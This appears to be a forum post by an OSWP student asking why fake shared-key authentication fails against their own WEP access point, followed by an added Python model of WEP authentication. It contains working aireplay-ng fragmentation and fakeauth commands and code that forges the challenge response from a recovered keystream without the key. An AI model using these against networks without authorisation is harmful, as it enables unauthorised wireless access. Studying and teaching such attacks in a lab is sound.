I have what I think is a simple question. I am in the middle of taking the OSWP course and have a question about authenticating against a WEP-encrypted network with SKA enabled. For reference:
$ap = my AP's MAC
$alfa = my MAC
$pc = another laptop I have connected to my AP's MAC
My goal is to fakeauth with my alfa card to my AP by using a PRGA .xor generated via a fragmentation attack. Yes, I know there are other ways I can inject (e.g. spoof my other client's MAC as my own after deauthing the other client, etc., and fakeauth as that source MAC). I don't want to do that because in a real-life scenario (i.e. a pentest) it could be noticed, and a good attacker would probably try to avoid it. Anyway - that aside, I must be missing something stupid here:
First I monitor my AP via airodump-ng with:

airodump-ng -c 6 --bssid $ap -w wepviaclient wlan0

And see the output with no problem, my PC connected to it, etc. (I'm posting this from a different computer so I can't copy and paste the output right now, and I don't think it's necessary for this because I know it's correct.)

Then I fragment to generate the .xor file:

aireplay-ng -5 -b $ap -h $alfa -l 255.255.255.255 -k 255.255.255.255 wlan0

A .xor is generated.

Then I attempt to fakeauth:

aireplay-ng -1 0 -a $ap -h $alfa -y fragment-0629-233133.xor wlan0

And I get:

Sending Authentication Request (Shared Key) [ACK]
Authentication 1/2 successful
Sending encrypted challenge [ACK]

Over, and over, and over.
The one thing I don't quite understand is the -l and -k switches when generating the .xor (I assume this is just so the AP will pass the packet through, but some clarification there might be the key). Any ideas what I'm doing wrong? I feel like it's something very simple that I'm missing. In the meantime, turning off SKA or generating ARPs as an auth'd client works fine to increase IVs, and I have already cracked the key several times. I don't know if this is really relevant to the course or not, but I really want to know why this doesn't work.
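The exchange the post is trying to complete, as an added example that is not part of the original post: a minimal model of WEP Shared Key Authentication, with the AP side (challenge, decrypt, ICV check, compare) and two client sides, one holding the key and one holding only a recovered PRGA keystream for a single IV, which is what aireplay-ng's -y option reads from the .xor file. (For the fragmentation step itself, -k and -l are aireplay-ng's destination and source IP for the forged packet it injects to obtain that keystream.) The WEP key, IV, known plaintext and challenge are constructed for illustration; the 1-byte key-index field that real frames carry after the IV is omitted, and the function names are this example's own.

```python
# Added example (not from the original post): WEP Shared Key Authentication and
# answering the challenge with a recovered PRGA keystream instead of the key.
# Key, IV, known plaintext and challenge are constructed; key-index byte omitted.
import os
import struct
import zlib
from typing import Optional, Tuple

AUTH_ALG_SHARED = 1
CHALLENGE_LEN = 128   # 802.11 SKA challenge text length
EID_CHALLENGE = 0x10  # Challenge Text information element id


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream (WEP keys RC4 with IV || key)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Station with the key: IV || (RC4(IV||key) XOR (plaintext || ICV))."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Strip IV, undo RC4, check ICV; raise ValueError on a bad ICV."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + key, len(ct)))
    pt, got = body[:-4], body[-4:]
    if got != icv(pt):
        raise ValueError("ICV mismatch")
    return pt


def recover_prga(known_plaintext: bytes, frame: bytes) -> Tuple[bytes, bytes]:
    """Attacker: keystream for the frame's IV = ciphertext XOR (plaintext || ICV).
    A fragmentation/chopchop attack extends this to a long .xor for that IV."""
    return frame[:3], xor(frame[3:], known_plaintext + icv(known_plaintext))


def auth_body(seq: int, status: int, challenge: Optional[bytes] = None) -> bytes:
    """Authentication frame body: algorithm, sequence number, status [, challenge IE]."""
    body = struct.pack("<HHH", AUTH_ALG_SHARED, seq, status)
    if challenge is not None:
        body += bytes([EID_CHALLENGE, len(challenge)]) + challenge
    return body


def parse_challenge(body: bytes) -> bytes:
    """Pull the challenge text out of a seq-2 (or decrypted seq-3) body."""
    if len(body) < 8 or body[6] != EID_CHALLENGE:
        return b""
    return body[8:8 + body[7]]


def keystream_needed() -> int:
    """PRGA bytes the seq-3 frame consumes: 6-byte header + 2-byte IE header + 128 + 4 ICV."""
    return len(auth_body(3, 0, bytes(CHALLENGE_LEN))) + 4


def client_response_with_key(key: bytes, iv: bytes, challenge: bytes) -> bytes:
    """Seq 3 from a legitimate client: the whole body is WEP-encrypted."""
    return wep_encrypt(key, iv, auth_body(3, 0, challenge))


def client_response_with_prga(iv: bytes, prga: bytes, challenge: bytes) -> bytes:
    """Seq 3 from an attacker holding only the keystream for `iv` (what -y supplies)."""
    body = auth_body(3, 0, challenge)
    body += icv(body)
    if len(prga) < len(body):
        raise ValueError("PRGA too short: need %d bytes, have %d" % (len(body), len(prga)))
    return iv + xor(body, prga)


def ap_verify(key: bytes, challenge: bytes, frame3: bytes) -> bool:
    """AP side of seq 3: decrypt, check ICV, compare the echoed challenge."""
    try:
        body = wep_decrypt(key, frame3)
    except ValueError:
        return False
    hdr = struct.unpack("<HHH", body[:6])
    return hdr == (AUTH_ALG_SHARED, 3, 0) and parse_challenge(body) == challenge


def demo() -> dict:
    key = bytes.fromhex("0102030405")   # constructed 40-bit WEP key, AP side only
    iv = b"\x11\x22\x33"                 # the IV the attacker has keystream for
    known_pt = bytes(range(200))         # constructed: captured frame with known plaintext
    prga_iv, prga = recover_prga(known_pt, wep_encrypt(key, iv, known_pt))
    challenge = parse_challenge(auth_body(2, 0, os.urandom(CHALLENGE_LEN)))  # seq 2, in the clear
    with_key = ap_verify(key, challenge, client_response_with_key(key, iv, challenge))
    with_prga = ap_verify(key, challenge, client_response_with_prga(prga_iv, prga, challenge))
    # The keystream is bound to its IV: sending it under another IV fails the ICV check.
    wrong_iv = ap_verify(key, challenge, client_response_with_prga(b"\0\0\0", prga, challenge))
    try:
        client_response_with_prga(prga_iv, prga[:100], challenge)
        short_accepted = True
    except ValueError:
        short_accepted = False
    return {"with_key": with_key, "with_prga": with_prga, "wrong_iv": wrong_iv,
            "short_prga_accepted": short_accepted, "prga_len": len(prga),
            "needed": keystream_needed()}


if __name__ == "__main__":
    print(demo())
```

The two things to check against a failing fakeauth are visible in `demo()`: the keystream must be at least `keystream_needed()` bytes (140 here for a 128-byte challenge), and it only works when replayed under the very IV it was recovered for, which is why the .xor file carries that IV along with the PRGA.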